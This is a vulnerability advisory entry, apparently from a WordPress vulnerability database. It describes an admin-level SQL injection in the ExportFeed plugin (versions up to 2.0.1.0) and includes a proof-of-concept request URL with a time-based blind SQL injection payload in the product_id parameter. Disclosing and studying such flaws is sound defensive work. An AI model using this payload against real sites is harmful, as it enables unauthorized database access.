WordPress Plugin Vulnerabilities
ExportFeed <= 2.0.1.0 - Admin+ SQL Injection
Description
The plugin does not sanitise and escape the product_id POST parameter before using it in a SQL statement, leading to a SQL injection vulnerability exploitable by high privilege users
Proof of Concept
https://example.com/wp-admin/admin-ajax.php?feedpath=core/ajax/wp/fetch_product_ajax.php&action=ebcpf_ebayseller_handles&security=1c6e01b2a4&category=&sku=snake&merchat_type=eBaySeller&service_name=eBaySeller&showOutofStock=1&limit=0,&q=savep&local_cat_ids=1&product_id=1+AND+(SELECT+9979+FROM+(SELECT(SLEEP(5)))IHgj)
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
0xdecafbad
Submitter
0xdecafbad
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-22 (about 2 years ago)
Added
2022-01-21 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)